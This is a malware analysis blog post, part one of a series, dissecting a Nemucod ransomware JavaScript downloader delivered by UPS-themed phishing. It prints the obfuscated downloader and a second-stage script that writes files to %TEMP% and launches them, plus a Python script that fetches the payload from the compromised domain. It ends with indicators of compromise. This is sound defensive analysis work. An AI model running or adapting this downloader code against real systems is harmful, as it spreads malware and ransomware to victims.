On July 3, 2017, Myonlinesecurity (Twitter @dvk01ukreported a new spam campaign targeting organizations around the world with a new Nemucod ransomware and a Kovter payload. The victims that were targeted in this campaign received a phishing email from “UPS Parcel” service. The email also included a ZIP file attachment and the message in this email subject advised the victims to re-check the shipment label by downloading the attachment, decompressing the ZIP file and the executing the extracted file on their system. On a preliminary analysis, on execution, this Javascript script attempts to download additional pieces of malware into the system and execute them thereafter. These pieces of malware involve an execution of obfuscated Javascript and PHP code, running Powershell and executing Portable Executable (PE) files on the affected system. If you want to see the attack flow from the initial email stage to the very end including looking at PCAP files and download the malware components, you can simply browse to malware-traffic-analysis .

In this blog post I will attempt to dissect the the Javascript downloader and the downloaded components. I will also show you how you can use analysis and programming skills to understand what the downloader does including also understanding any process running as a result of this downloader execution on the system. I will attempt to do a good job providing as many details as I can so you can follow step-by-step and attempt to do exactly what I have done from an analysis perspective. Please note that this blog post will be splitted into several different parts (part I, part II, part III and so on) since there are many components in this attack stage. Each component required a lot of effort of explanation so I don’t want to blog post to become huge. Stay tuned for the upcoming Parts.

Analysis of the Javascript Downloader

As mentioned, the attachment in the email is a Javascript file. It appears to have a .doc extension to make the victim believe he/she clicking on a Word document file. The malicious Javascript can be found (and downloaded) in the following online resources:

However, you can also copy and paste the following Javascript to a text editor and save it to any filename of your likings. Anyway, when editing the Javascript via a text editor, you should see the following code:

function zulum(pikue) {pikue.send();}
function zulum(pikue) {pikue.send();}
var x = ["","","","",""];
var robs = 20-20;
var mumik = new Array('GET','JIJINGER');
var mustafa = x.length;
  if(robs>=mustafa) { 
  try { 
       var joseph = new ActiveXObject(akrim("MSXML2.XAAMAALHTTP")); 
       var zemk = '000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMI
       var ghyt = false; 
       var gerlk = x[robs]; 
       var ruxk = 'ac320ee6e35e359c10a31d3051aae8ae';[2-2], "http://"+gerlk+'/'+greezno()+'?'+zemk, ghyt); zulum(joseph); 
       var gt = joseph.responseText; 
       var miffka = gt.indexOf(ruxk); 
       var pista = gt.length; 
       var miluoki = "a"; 
       if ((pista+0) > (8+1+1) * 100 && 2 == 2)  
           if (miffka + 3 > 2) 
             var gusar = rizma(gt, ruxk).join(miluoki+""); 
function malysh() {return akrim("htAAtp");}
function rizma(kjg, lki) { return kjg.split(lki);}
function greezno() {return akrim('counAAter');
}function hust(gulibator){eval(gulibator);
}function akrim(grigam,podol){return grigam.replace(/AA/g,"");}

Please note that if you are seasoned malware analyst and you are interested to see what this Javascript script does from dynamic execution analysis perspective, you can run this script using the following command on your Windows CLI:

wscript evil.js

However, please note that you will need your analysis system to be able to access the Internet so this Javascript downloader can access the compromised website and then download the rest of the components. On a side note, some security professionals don’t like to do this as they don’t want “tip-off” the attackers. If all went well and the Javascript successfully downloaded additional components and executed them on your system, you should see the following parent/child processes running in your task manager:

Figure 1: Parent/Child Process Creation

On a side note, I have used Sysinternals Process explorer to track the execution of these processes and generate the images in figure 1. You can also use Sysinternal process monitor and then filter down by process name/PID and operation if you want to learn what each one of these processe was doing on your system. I will cover some of that process in a later topic of this blog post.

Anyway, as you can see in the first image above, the execution of the malicious Javascript downloader have caused the script to execute additional components into the affected system. Later we will see that some of these processes related to files that were downloaded by this Javascript file after execution. Thereafter, you can see that the wscript process spawned two separated processes (each belongs to a malicious PE file). Thereafter, in the second image you can see that the legitimate svchost.exe service spawned another process and that process spawned another process and so on. The mshta.exe file is a Windows executable that allows a user to execute .HTA files. The powershell.exe process is a process that executes Microsoft Powershell script. Finally, the last image suggest that the the Windows regsvr32.exe file also ran as a process.

That said, if you already confused, not to worry as you don’t have to infect your system using dynamic analysis. Instead, just keep reading!

Code Cleanup, New Javascript Download

Alright, so at a first glance in the Javascript code above, that might look like a lot to digest. However, rest assured, there are several variables and loops in this code that does not have to do anything with downloading the malware to the affected system and executing it. On a side note, during my previous analysis of malware variants I have noticed that malware developers typically like to include junk and additional irrelevant pieces of code inside their malware to make it seem as if the malware run a lot of processes. They do this to make it harder for the non-technical individuals for analyzing their malware or get lost in that process.  However, after cleaning up the code from all the junk including learning what pieces of the code are actually important, I have created the following Python script to perform the same process just in a much nicer and cleaner way:

import os, sys, requests

value1 = '000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi
value2 = "a"
value3 = 'ac320ee6e35e359c10a31d3051aae8ae'
#Create an output text file
file1 = open("NewOutput.txt", 'w')
def main(): 
      #Run loop indefinitely  
      while True: 
           #Perform a get request to the compromised website. 
           ResponseOutput = requests.get('http://resedaplumbing[.]com/counter?'+value1) 
           #Get the text content GetOutput = ResponseOutput.text 
           #Get the length of the output to ensure it is bigger then 900 chars 
           DownloadedOutput = len(GetOutput)
           if (DownloadedOutput > 900): 
              #Run some split and join operations (based on the Javascript manipulation) 
              split1 = GetOutput.split(value3) 
              Newoutput = value2.join(split1) 
              #Write the final output to a text file, close the file and exit the loop 
       except Exception, error: 
           print error 
   except KeyboardInterrupt: 

if __name__ == '__main__': 
   #Run the Main function

Few things to note from the Python script above:

  • I added square brackets to domain resedaplumbing[.]com to avoid anyone clicking on. If you copy and paste this script, please ensure to remove the brackets before running the script
  • The compromised website was up and running when I prepared this blog post. If the website is down then don’t worry, you are in a good hands. Just keep reading this blog post and you will see what next is downloaded by this malicious script.
  • The output from the GET request to this website is saved into a filename called NewOutput.txt. This file is saved locally relative to the Python script location on your system. This file is also additional Javascript file belongs to the Numucode malware. Please note that you can change this filename to whatever filename you want.
    • The out doesn’t get executed on your system so don’t worry you won’t run any of the malicious processes on your system.
  • Before the output is saved to the text file, the script perform some manipulations (i.e. splitting and joining values) to the output received by the GET request. I didn’t make these manipulations up. Rather, I reviewed the code in the original Javascript script and ran the same processes in Python.
  • Finally, Python is sensitive to indentation. So if you copy and paste my script, please ensure that you have proper indentation.
  • If you don’t want to download this Javascript file then just keep reading below. I provided two online resources (VirusTotal and ReverseIT) that you can download this Javascript file from.

Analysis of the New Downloaded Javascript

If all worked well for you in the previous section then you should get a new Javascript file. The MD5 hashing value of this file is 2c7e822cdd0f98e2aea039e385c265da. When looking at the file content in a text editor, you should see something as the following:

var goxe='var ld';
goxe+='=0; va';goxe+='r cs=St';goxe+='ring.f';goxe+='romCharCod';
goxe+='e(92); var';goxe+=' cq=Stri';goxe+='ng.fromC';goxe+='harCod';
goxe+='e(34)';goxe+='; var';goxe+=' ll=["w';goxe+='';goxe+='';
goxe+='; var';goxe+=' ws=WScrip'; goxe+='t.Create';goxe+='Object';
goxe+='("WScrip';goxe+='t.She';goxe+='ll"); var ';goxe+='fn=ws.Ex';goxe+='pandE'; 
goxe+='"; var';goxe+=' pd=ws.';goxe+='Expand';goxe+='Environ';goxe+='mentStrin';goxe+='gs("%';goxe+='TEMP%")+cs'; 
goxe+='+"php5.dl';goxe+='l"; var';goxe+=' xo=WSc';goxe+='ript.Creat';goxe+='eObjec';goxe+='t("MS';goxe+='XML2.'; 
goxe+='XMLHTT';goxe+='P"); va';goxe+='r xa=W';goxe+='Script';goxe+='.CreateOb';goxe+='ject("A';goxe+='DODB.S';goxe+='tream"); 
v';goxe+='ar fo=WS';goxe+='cript.C';goxe+='reateO';goxe+='bject("';goxe+='Scriptin';goxe+='g.FileS';goxe+='ystemO';goxe+='bject"); '
;goxe+='if (!';goxe+='fo.FileExi';goxe+='sts(fn';goxe+='+".doc';goxe+='")) { var ';goxe+='fp=fo.Cr';goxe+='eateTex'; 
goxe+='tFile(fn';goxe+='+".doc",t';goxe+='rue); ';goxe+='for(va';goxe+='r i=0; i<';goxe+='8310;';goxe+=' i++) { '; 
goxe+='dom()';goxe+='*64+2';goxe+='0))); }; f';goxe+='p.Clo';goxe+='se(); ';goxe+='try{ws.Ru';goxe+='n(fn+".d';
goxe+='oc",1,0);}'; goxe+='catch(er){';goxe+='}; fo';goxe+='r (var n=2';goxe+='; n<=4; ';goxe+='n++) { ';
goxe+='for(var i';goxe+='=ld;i<ll.l'; goxe+='ength;i+';goxe+='+) { var';goxe+=' dn=0';goxe+='; try { x';
goxe+='"';goxe+='GET",';goxe+='"http';goxe+='://"+'; goxe+='ll[i]+"/';goxe+='counter/?'; goxe+='000000157k
ly zpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQABa51pzaa6WhRlOaAFY5es5ezP6KAlLpyAqe1RkSVFJiV-pIV- 
?>';goxe+='"); f';goxe+='p.Close();';goxe+=' ws.Ru';goxe+='n(fn+';goxe+='".exe "+'; goxe+='cq+fn+".ph';go
xe+='p"+cq+" ';goxe+='157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2 0.1075 MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT4zY95ZcMDYUN3Y
ozYlf3VsLMEEVLi0M9/EVLAsDOas mgUEv+dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcpdjxoB99ZZZQqclA7R4eO24+OgMltMFrgUqATmP2G1VArM
y i36muwh573z5ymtJ+p1TER9yekK0TtcNpZOSZ/hQXL+qHLqjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8f vC6mzUAr9rRXZlD+aNMjec6Y
SqlyzpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQAB",0';goxe+=',1); }; }';goxe+=' else { t';
goxe+='ry{ws.Run';goxe+='(fn+".doc"';goxe+=',1,0)';goxe+=';}catch(';goxe+='er){}; }';goxe+=';' ;eval(goxe);

For your convenience, I have uploaded that script to the following online resources:

Feel free to download that Javascript from any of these resources. Please note that I didn’t include the entire script output in the section above as the script is too long. Instead I only show several lines from the top and bottom of the script. In a nutshell, this is what this Javascript is all about:

  • It creates a new variable called goxe then this variable start adding sections of the code (one at the time) to an array.
  • At the end of the script, the Javascript executes this goxe array using the Javascript eval(goxe) operation. The eval function allows you to execute a Javascript code. However, we DO NOT want to execute (or evaluate) this array. Instead we want to only generate the output to a new file. To do it, please Keep reading the next section.

Saving Javascript Output to a New Javascript File

In order to save the output of this Javascript to a new file, this is where you can utilize the help of NodeJS. This blog post won’t cover NodeJS but you can download and install NodeJS for Windows, MAC and Linux. Just access NodeJS download page here  If you use a macbook for the analysis process, you can simply install NodeJS with brew doing the following command:

brew install node

Alright, after you have installed NodeJs on your system, you will need to edit the NewOutput.txt file in a text-editor by performing the following steps:

  1. Open the Javascript (from the last section) in a text-editor of your choice.
  2. Replace the eval value eval(goxe)  with the following values: var x = goxe;console.log(x);
    • Don’t forget the semicolons
  3. Now save the script and exit the editor

Replacing the eval value with console.log will cause the Javascript to print out the output on the screen rather than executing it on your system.

Alright, once if you have the changes above, please run the following command to execute this command:

node NewOutput.txt > secondoutput.js

The output will be saved to a new file called secondoutput.js. Please note that you can call this output file whatever you want. The MD5 hashing value of the new file is b2f688a305571215e4f3079af3b601ca. I also uploaded this file to the following online resources for your convenience:

This is the main component of the Nemucode ransomware. Please continue to part II to see an analysis of this ransomware.

Indicators of Compromise 

The following list contain MD5 hashes of files related to this attack:


The following domain:

Please note that this domain is registered with GoDaddy since 2012. This website also appears to be belonging to some plumbing company. However, it appears that the website associated with this domain is blacklisted by multiple security vendors at the time of writing this blog post. Addition information can be found in here VirusTotal. If you query your proxy or SIEM for a URL associated with this domain, you can always ensure that you also see in the URL something like that:

http://resedaplumbing[.]com/counter?000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi 78TzT4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9_EVLAsDOasmgUEv-dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcpdjxoB 99ZZZQqclA7R4eO24-OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ-p1TER9yekK0TtcNpZOSZ_hQXL-qHLqjtgrowHPENtjjB MDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD-aNMjec6YSqlyzpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2 fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQABa51pzaa6WhRlOaAFY5es5ezP6KAlLpyAqe1RkSVFJiV-pIV-3ITa0CQz5dhBA PLjrA7S6nqsr4jvG0bcMb691oiFy2rROgpkHr1JNjd3NQ0

This could indicate some signs of evil going on so that will require further investigations on your part.

Browse to PART II to continue reading this analysis

Leave a Comment

Your email address will not be published. Required fields are marked *